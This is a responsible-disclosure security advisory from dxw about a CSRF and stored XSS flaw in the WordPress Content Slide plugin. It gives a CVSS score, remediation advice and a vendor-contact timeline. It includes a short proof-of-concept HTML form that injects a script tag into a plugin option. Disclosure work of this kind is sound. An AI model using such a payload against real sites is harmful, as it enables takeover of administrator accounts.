Software: Wordpress Content Slide
Advisory report: https://security.dxw.com/advisories/csrf-and-stored-xss-in-wordpress-content-slide-allow-an-attacker-to-have-full-admin-privileges/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
CSRF and stored XSS in WordPress Content Slide allow an attacker to have full admin privileges
Proof of concept
While logged into a site with the plugin enabled open a page containing the following formÂ and click the submit button (in a real attack the form could be made to auto-submit):
<form action=\"http://localhost/wp-admin/admin.php?page=content-slide/content_slide.php\" method=\"POST\">
<input type=\"text\" name=\"wpcs_options[no_of_custom_images]\" value=\"1\">
<input type=\"text\" name=\"wpcs_options[slide_image1]\" value=\""><script>alert(1)</script>\">
Disable the plugin until a new version is released that fixes this bug
At the time of publishing no fix is available and the plugin has been removed from the plugin directory
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on firstname.lastname@example.org to acknowledge this report if you received it via a third party (for example, email@example.com) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
2014-12-16: Reported to vendor via email form atÂ http://www.snilesh.com/contact-me/
2014-12-16: Requested CVE
2015-01-07: Vendor responded
2015-01-09: Vendor chased
2015-04-09: Vendor had given assurances that a fix would be available, and wasÂ given multiple extensions to do so, but by this point they had stopped responding. Emailed firstname.lastname@example.org requesting a takedown.
2015-04-16: Confirmed that the plugin is no longer on the directory. Published.
Discovered by dxw:
Please visit security.dxw.com for more information.